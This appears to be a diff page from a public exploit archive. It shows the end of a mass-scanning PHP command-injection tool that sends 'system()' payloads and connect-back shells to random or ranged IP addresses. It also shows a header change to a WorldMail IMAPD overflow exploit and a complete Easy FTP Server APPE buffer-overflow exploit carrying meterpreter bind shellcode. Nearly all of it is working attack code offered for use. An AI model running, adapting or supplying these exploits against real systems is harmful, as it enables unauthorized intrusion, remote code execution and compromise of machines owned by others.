||||
if rd:
|
||||
for l1n3 in ss.read():
|
||||
sys.stdout.write(l1n3)
|
||||
elif m0de == XPLT:
|
||||
p4yl0rd = m4k3_p4yl0rd(c0nn_b4ck, m0de)
|
||||
ss.write(p4yl0rd)
|
||||
else:
|
||||
if args.v:
|
||||
print "-> n0 w3bs3rv3r 0n %s" % (args.h)
|
||||
return
|
||||
|
||||
|
||||
def s3nd_sh1t(args, m0de, c0nn_b4ck):
|
||||
pat = ('<b>Parse error</b>:', '<b>Warning</b>:')
|
||||
s = d0_c0nn3ct(args)
|
||||
if s:
|
||||
if m0de == VULN:
|
||||
p4yl0rd = m4k3_p4yl0rd('', m0de)
|
||||
s.sendall(p4yl0rd)
|
||||
try:
|
||||
d4t4 = s.recv(8192)
|
||||
except:
|
||||
return
|
||||
for p in pat:
|
||||
try:
|
||||
if p in d4t4:
|
||||
print "-> " + args.h + " vu1n"
|
||||
if args.f:
|
||||
wr1te_fil3(args)
|
||||
return args.h
|
||||
else:
|
||||
if args.v:
|
||||
print "-> %s n0t vu1n" % (args.h)
|
||||
return
|
||||
except:
|
||||
return
|
||||
elif m0de == SCMD:
|
||||
p4yl0rd = m4k3_p4yl0rd('<? system("' + args.c + '"); ?>', m0de)
|
||||
s.sendall(p4yl0rd)
|
||||
rd, wd, ex = select.select([s], [], [], float(args.T))
|
||||
if rd:
|
||||
try:
|
||||
for l1n3 in s.makefile():
|
||||
print l1n3,
|
||||
except:
|
||||
return
|
||||
elif m0de == XPLT:
|
||||
p4yl0rd = m4k3_p4yl0rd(c0nn_b4ck, m0de)
|
||||
s.sendall(p4yl0rd)
|
||||
else:
|
||||
if args.v:
|
||||
print "-> c0uld n0t c0nn3ct t0 %s" % (args.h)
|
||||
return
|
||||
|
||||
|
||||
def d0_c0nn3ct(args):
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.settimeout(float(args.t))
|
||||
res = s.connect_ex((args.h, int(args.p)))
|
||||
if res == 0:
|
||||
return s
|
||||
except socket.error:
|
||||
return
|
||||
return
|
||||
|
||||
|
||||
def m4k3_r4nd_1p4ddr(num):
|
||||
h0sts = []
|
||||
for x in range(int(num)):
|
||||
h0sts.append('%d.%d.%d.%d' % (random.randrange(0,255),
|
||||
random.randrange(0,255), random.randrange(0,255),
|
||||
random.randrange(0,255)))
|
||||
return h0sts
|
||||
|
||||
|
||||
def d0_sc4n(args, h0st, m0de, vu1nz, rsa, rsb):
|
||||
args.h = h0st.rstrip()
|
||||
if args.S:
|
||||
s3nd_sh1t_ss1(args, m0de, None)
|
||||
else:
|
||||
s3nd_sh1t(args, m0de, None)
|
||||
return
|
||||
|
||||
|
||||
def sc4n_r4ng3(args, m0de, rsa, rsb):
|
||||
vu1nz = []
|
||||
for i in range (rsa[0], rsb[0]):
|
||||
for j in range (rsa[1], rsb[1]):
|
||||
for k in range (rsa[2], rsb[2]):
|
||||
for l in range(rsa[3], rsb[3]):
|
||||
args.h = str(i) + "." + str(j) + "." + str(k) + "." + str(l)
|
||||
if args.S:
|
||||
s3nd_sh1t_ss1(args, m0de, None)
|
||||
else:
|
||||
s3nd_sh1t(args, m0de, None)
|
||||
return
|
||||
|
||||
|
||||
def m4k3_ipv4_r4ng3(iprange):
|
||||
a = tuple(part for part in iprange.split('.'))
|
||||
rsa = (range(4))
|
||||
rsb = (range(4))
|
||||
for i in range(0,4):
|
||||
ga = a[i].find('-')
|
||||
if ga != -1:
|
||||
rsa[i] = int(a[i][:ga])
|
||||
rsb[i] = int(a[i][1+ga:]) + 1
|
||||
else:
|
||||
rsa[i] = int(a[i])
|
||||
rsb[i] = int(a[i]) + 1
|
||||
return (rsa, rsb)
|
||||
|
||||
|
||||
def parse_args():
|
||||
p = argparse.ArgumentParser(
|
||||
usage='\n\n ./ap-unlock-v1337.py -h <4rg> -s | -c <4rg> | -x <4rg> ' \
|
||||
'[0pt1ons]\n ./ap-unlock-v1337.py -r <4rg> | -R <4rg> | -i <4rg>'\
|
||||
' [0pt1ons]',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False)
|
||||
opts = p.add_argument_group('0pt1ons', '')
|
||||
opts.add_argument('-h', metavar='wh1t3h4tz.0rg',
|
||||
help='| t3st s1ngle h0st f0r vu1n')
|
||||
opts.add_argument('-p', default=80, metavar='80',
|
||||
help='| t4rg3t p0rt (d3fau1t: 80)')
|
||||
opts.add_argument('-S', action='store_true',
|
||||
help='| c0nn3ct thr0ugh ss1')
|
||||
opts.add_argument('-c', metavar='\'uname -a;id\'',
|
||||
help='| s3nd c0mm4nds t0 h0st')
|
||||
opts.add_argument('-x', metavar='192.168.0.2:1337',
|
||||
help='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll')
|
||||
opts.add_argument('-s', action='store_true',
|
||||
help='| t3st s1ngl3 h0st f0r vu1n')
|
||||
opts.add_argument('-r', metavar='133.1.3-7.7-37',
|
||||
help='| sc4nz iP addr3ss r4ng3 f0r vu1n')
|
||||
opts.add_argument('-R', metavar='1337',
|
||||
help='| sc4nz num r4nd0m h0st5 f0r vu1n')
|
||||
opts.add_argument('-t', default=2, metavar='2',
|
||||
help='| c0nn3ct t1me0ut in s3x (d3fau1t: 3)')
|
||||
opts.add_argument('-T', default=2, metavar='2',
|
||||
help='| r3ad t1me0ut in s3x (d3fau1t: 3)')
|
||||
opts.add_argument('-f', metavar='vu1n.lst',
|
||||
help='| wr1t3 vu1n h0sts t0 f1l3')
|
||||
opts.add_argument('-i', metavar='sc4nz.lst',
|
||||
help='| sc4nz h0sts fr0m f1le f0r vu1n')
|
||||
opts.add_argument('-v', action='store_true',
|
||||
help='| pr1nt m0ah 1nf0z wh1l3 sh1tt1ng')
|
||||
args = p.parse_args()
|
||||
if not args.h and not args.r and not args.R and not args.i:
|
||||
p.print_help()
|
||||
sys.exit(0)
|
||||
return args
|
||||
|
||||
|
||||
def wr1te_fil3(args):
|
||||
try:
|
||||
f = open(args.f, "a+")
|
||||
f.write(args.h + "\n")
|
||||
f.close()
|
||||
except:
|
||||
sys.stderr.write('[-] 3rr0r: de1n3 mudd1 k0cht guT')
|
||||
sys.stderr.write('\n')
|
||||
raise SystemExit()
|
||||
return
|
||||
|
||||
|
||||
def run_threads(args, h0sts, m0de, vu1nz, rsa, rsb):
|
||||
num_h0sts = len(h0sts)
|
||||
num = 0
|
||||
try:
|
||||
if args.r:
|
||||
sc4n_r4ng3(args, m0de, rsa, rsb)
|
||||
else:
|
||||
for h0st in h0sts:
|
||||
num += 1
|
||||
if args.v:
|
||||
sys.stdout.flush()
|
||||
sys.stdout.write("[" + str(num) + "/" + str(num_h0sts) +
|
||||
"] ")
|
||||
else:
|
||||
sys.stdout.flush()
|
||||
sys.stdout.write("\r[+] h0sts sc4nn3d: " + str(num) +
|
||||
"/" + str(num_h0sts) + " \b")
|
||||
t = threading.Thread(target=d0_sc4n, args=(args, h0st, m0de,
|
||||
vu1nz, None, None))
|
||||
t.start()
|
||||
t.join()
|
||||
except KeyboardInterrupt:
|
||||
sys.stdout.flush()
|
||||
sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")
|
||||
raise SystemExit
|
||||
return
|
||||
|
||||
|
||||
def c0ntr0ller():
|
||||
vu1nz = []
|
||||
m0de = NONE
|
||||
try:
|
||||
args = parse_args()
|
||||
if args.h:
|
||||
if args.s:
|
||||
print "[+] sc4nn1ng s1ngl3 h0st %s " % (args.h)
|
||||
m0de = VULN
|
||||
if args.S:
|
||||
s3nd_sh1t_ss1(args, m0de, None)
|
||||
else:
|
||||
s3nd_sh1t(args, m0de, None)
|
||||
elif args.c:
|
||||
print "[+] s3nd1ng c0mm4ndz t0 h0st %s " % (args.h)
|
||||
m0de = SCMD
|
||||
if args.S:
|
||||
s3nd_sh1t_ss1(args, m0de, None)
|
||||
else:
|
||||
s3nd_sh1t(args, m0de, None)
|
||||
elif args.x:
|
||||
print "[+] xpl0it1ng b0x %s " % (args.h)
|
||||
m0de = XPLT
|
||||
if args.x.find(':') != -1:
|
||||
if not args.x.split(':')[1]:
|
||||
print "[-] 3rr0r: p0rt m1ss1ng"
|
||||
else:
|
||||
cb_h0st = args.x.split(':')[0]
|
||||
cb_p0rt = args.x.split(':')[1]
|
||||
else:
|
||||
print "[-] 3rr0r: <h0st>:<p0rt> y0u l4m3r"
|
||||
c0nn_b4ck = m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt)
|
||||
if args.S:
|
||||
s3nd_sh1t_ss1(args, m0de, c0nn_b4ck)
|
||||
else:
|
||||
s3nd_sh1t(args, m0de, c0nn_b4ck)
|
||||
else:
|
||||
print "[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch"
|
||||
sys.exit(-1)
|
||||
if args.r:
|
||||
print "[+] sc4nn1ng r4ng3 %s " % (args.r)
|
||||
m0de = VULN
|
||||
rsa, rsb = m4k3_ipv4_r4ng3(args.r)
|
||||
run_threads(args, None, m0de, None, rsa, rsb)
|
||||
if args.R:
|
||||
print "[+] sc4nn1ng %d r4nd0m b0xes" % (int(args.R))
|
||||
m0de = VULN
|
||||
h0sts = m4k3_r4nd_1p4ddr(int(args.R))
|
||||
run_threads(args, h0sts, m0de, vu1nz, None, None)
|
||||
if args.i:
|
||||
print "[+] sc4nn1ng b0xes fr0m f1le %s" % (args.i)
|
||||
m0de = VULN
|
||||
h0sts = tuple(open(args.i, 'r'))
|
||||
run_threads(args, h0sts, m0de, vu1nz, None, None)
|
||||
except KeyboardInterrupt:
|
||||
sys.stdout.flush()
|
||||
sys.stderr.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")
|
||||
raise SystemExit
|
||||
return
|
||||
|
||||
|
||||
def m41n():
|
||||
if __name__ == "__main__":
|
||||
print "--==[ ap-unlock-v1337.py by noptrix@nullsecurity.net ]==--"
|
||||
c0ntr0ller()
|
||||
else:
|
||||
print "[-] 3rr0r: y0u fuck3d up dud3"
|
||||
sys.exit(1)
|
||||
print "[+] h0p3 1t h3lp3d"
|
||||
|
||||
|
||||
# \o/ fr33 requiem 1337 h4x0rs ...
|
||||
m41n()
|
||||
|
||||
# e0F
|
||||
|
|
@ -1,4 +1,24 @@
|
|||
#!/usr/bin/python
|
||||
#!/usr/bin/env python
|
||||
# -*- coding: latin-1 -*- # ####################################################
|
||||
# ____ _ __ #
|
||||
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
|
||||
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
|
||||
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
|
||||
# /___/ nullsecurity team #
|
||||
# #
|
||||
# wm-imapd.py - WorldMail IMAPD remote exploit #
|
||||
# #
|
||||
# DATE #
|
||||
# 09/01/2012 #
|
||||
# #
|
||||
# DESCRIPTION #
|
||||
# WorldMail IMAPD - SEH overflow - remote exploit #
|
||||
# #
|
||||
# AUTHOR #
|
||||
# TheXero - http://www.nullsecurity.net/ #
|
||||
# #
|
||||
################################################################################
|
||||
|
||||
import sys
|
||||
import socket
|
||||
|
||||
|
|
@ -10,8 +30,8 @@ import socket
|
|||
|
||||
## Check for parameters
|
||||
if len(sys.argv) != 3:
|
||||
print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
|
||||
quit()
|
||||
print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
|
||||
quit()
|
||||
|
||||
## Assigns the parameters
|
||||
target = sys.argv[1]
|
||||
|
|
@ -68,3 +88,4 @@ data=s.recv(1024)
|
|||
s.send("a001 LIST " + buffer + "\r\n")
|
||||
s.close()
|
||||
|
||||
# EOF
|
||||
98
platforms/windows/remote/40234.py
Executable file
98
platforms/windows/remote/40234.py
Executable file
|
|
@ -0,0 +1,98 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: latin-1 -*- # ####################################################
|
||||
# ____ _ __ #
|
||||
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
|
||||
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
|
||||
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
|
||||
# /___/ nullsecurity team #
|
||||
# #
|
||||
# Easy FTP server remote exploit #
|
||||
# #
|
||||
# DATE #
|
||||
# 03/03/2012 #
|
||||
# #
|
||||
# DESCRIPTION #
|
||||
# Easy FTP Server - "APPE" command buffer overflow - remote exploit #
|
||||
# #
|
||||
# AUTHOR #
|
||||
# Swappage - http://www.nullsecurity.net/ #
|
||||
# #
|
||||
################################################################################
|
||||
|
||||
import socket
|
||||
|
||||
username = "anonymous"
|
||||
password = "a@a"
|
||||
hostname = "192.168.1.143"
|
||||
port = 21
|
||||
|
||||
#009BFE69 <--- where to go
|
||||
#009BFC6C <--- value of ESP
|
||||
# increment ESP and add patch to that memory location
|
||||
|
||||
patch=("\xcc"
|
||||
"\x89\xe3"
|
||||
"\x83\xc4\x5a"
|
||||
"\x83\xc4\x5a"
|
||||
"\x83\xc4\x5a"
|
||||
"\x83\xc4\x5a"
|
||||
"\x83\xc4\x5a"
|
||||
"\x83\xc4\x3b"
|
||||
"\xc7\x04\x24\xd8\xd1\xec\xf7"
|
||||
"\x89\xdc"
|
||||
"\x31\xdb"
|
||||
)
|
||||
|
||||
#
|
||||
#shellcode: windows/meterpreter/bind_tcp on port 4444
|
||||
#
|
||||
stage1=(
|
||||
"\x31\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
|
||||
"\xf8\x6c\x9c\xb0\x83\xee\xfc\xe2\xf4\x04\x84\x15\xb0\xf8\x6c"
|
||||
"\xfc\x39\x1d\x5d\x4e\xd4\x73\x3e\xac\x3b\xaa\x60\x17\xe2\xec"
|
||||
"\xe7\xee\x98\xf7\xdb\xd6\x96\xc9\x93\xad\x70\x54\x50\xfd\xcc"
|
||||
"\xfa\x40\xbc\x71\x37\x61\x9d\x77\x1a\x9c\xce\xe7\x73\x3e\x8c"
|
||||
"\x3b\xba\x50\x9d\x60\x73\x2c\xe4\x35\x38\x18\xd6\xb1\x28\x3c"
|
||||
"\x17\xf8\xe0\xe7\xc4\x90\xf9\xbf\x7f\x8c\xb1\xe7\xa8\x3b\xf9"
|
||||
"\xba\xad\x4f\xc9\xac\x30\x71\x37\x61\x9d\x77\xc0\x8c\xe9\x44"
|
||||
"\xfb\x11\x64\x8b\x85\x48\xe9\x52\xa0\xe7\xc4\x94\xf9\xbf\xfa"
|
||||
"\x3b\xf4\x27\x17\xe8\xe4\x6d\x4f\x3b\xfc\xe7\x9d\x60\x71\x28"
|
||||
"\xb8\x94\xa3\x37\xfd\xe9\xa2\x3d\x63\x50\xa0\x33\xc6\x3b\xea"
|
||||
"\x87\x1a\xed\x90\x5f\xae\xb0\xf8\x04\xeb\xc3\xca\x33\xc8\xd8"
|
||||
"\xb4\x1b\xba\xb7\x07\xb9\x24\x20\xf9\x6c\x9c\x99\x3c\x38\xcc"
|
||||
)
|
||||
#patch=("\xd8\xd1\xec\xf7")
|
||||
stage2=(
|
||||
"\xb0\x07\xb9\xcc\xe0\xa8\x3c\xdc\xe0\xb8\x3c"
|
||||
"\xf4\x5a\xf7\xb3\x7c\x4f\x2d\xe5\x5b\x81\x23\x3f\xf4\xb2\xf8"
|
||||
"\x7d\xc0\x39\x1e\x06\x8c\xe6\xaf\x04\x5e\x6b\xcf\x0b\x63\x65"
|
||||
"\xab\x3b\xf4\x07\x11\x54\x63\x4f\x2d\x3f\xcf\xe7\x90\x18\x70"
|
||||
"\x8b\x19\x93\x49\xe7\x71\xab\xf4\xc5\x96\x21\xfd\x4f\x2d\x04"
|
||||
"\xff\xdd\x9c\x6c\x15\x53\xaf\x3b\xcb\x81\x0e\x06\x8e\xe9\xae"
|
||||
"\x8e\x61\xd6\x3f\x28\xb8\x8c\xf9\x6d\x11\xf4\xdc\x7c\x5a\xb0"
|
||||
"\xbc\x38\xcc\xe6\xae\x3a\xda\xe6\xb6\x3a\xca\xe3\xae\x04\xe5"
|
||||
"\x7c\xc7\xea\x63\x65\x71\x8c\xd2\xe6\xbe\x93\xac\xd8\xf0\xeb"
|
||||
"\x81\xd0\x07\xb9\x27\x50\xe5\x46\x96\xd8\x5e\xf9\x21\x2d\x07"
|
||||
|
||||
"\xb9\xa0\xb6\x84\x66\x1c\x4b\x18\x19\x99\x0b\xbf\x7f\xee\xdf"
|
||||
"\x92\x6c\xcf\x4f\x2d\x6c\x9c\xb0"
|
||||
)
|
||||
#009BFD5D where to jmp
|
||||
buffer = "\x90" * (258 - (len(patch) + len(stage1))) + patch + "\x90"*10 + stage1 + "\x5d\xfd\x9b\x00" + stage2 + "\x90" * 50
|
||||
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.settimeout(5)
|
||||
## Connects and receives the banner
|
||||
s.connect((hostname, port))
|
||||
a = s.recv(1024)
|
||||
print a
|
||||
s.send("user " + username + "\r\n")
|
||||
a =s.recv(1024)
|
||||
print a
|
||||
s.send("pass " + password + "\r\n")
|
||||
a = s.recv(1024)
|
||||
print a
|
||||
s.send("APPE " + buffer + "\r\n")
|
||||
s.close()
|
||||
|
||||
# EOF
|
||||
Loading…
Add table
Reference in a new issue